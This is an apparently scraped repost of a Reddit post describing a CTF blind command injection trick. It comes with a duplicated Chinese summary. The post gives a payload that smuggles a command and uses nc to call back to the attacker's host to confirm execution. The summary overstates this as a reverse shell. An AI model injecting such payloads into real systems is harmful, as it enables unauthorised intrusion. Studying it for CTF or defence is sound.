Blind Command Injection Win with Just echo + grep + nc
作者在CTF靶机中发现命令注入漏洞但无标准输出,通过构造`; echo teststring | grep teststring && nc <my_ip> <port>`实现反弹shell验证漏洞有效性,并分享了无需完整shell的盲注技巧。 2025-8-9 19:26:12 Author: www.reddit.com(查看原文) 阅读量:3 收藏
作者在CTF靶机中发现命令注入漏洞但无标准输出,通过构造`; echo teststring | grep teststring && nc <my_ip> <port>`实现反弹shell验证漏洞有效性,并分享了无需完整shell的盲注技巧。 2025-8-9 19:26:12 Author: www.reddit.com(查看原文) 阅读量:3 收藏
Had a target last week (CTF box) where I knew I had command injection, but no stdout at all.
Instead of going for a full shell, I tried something super simple:
; echo teststring | grep teststring && nc <my_ip> <port>
The idea:
-
If the payload runs,
grepfinds my marker string. -
That success triggers a quick
ncback to me. -
No need for output on the page just a “yep, it worked” ping.
Honestly didn’t expect it to be that effective, but it gave me confirmation in seconds.
Anyone else have low-effort, no-shell-needed tricks for blind injections?
文章来源: https://www.reddit.com/r/HowToHack/comments/1mlxxoy/blind_command_injection_win_with_just_echo_grep_nc/
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh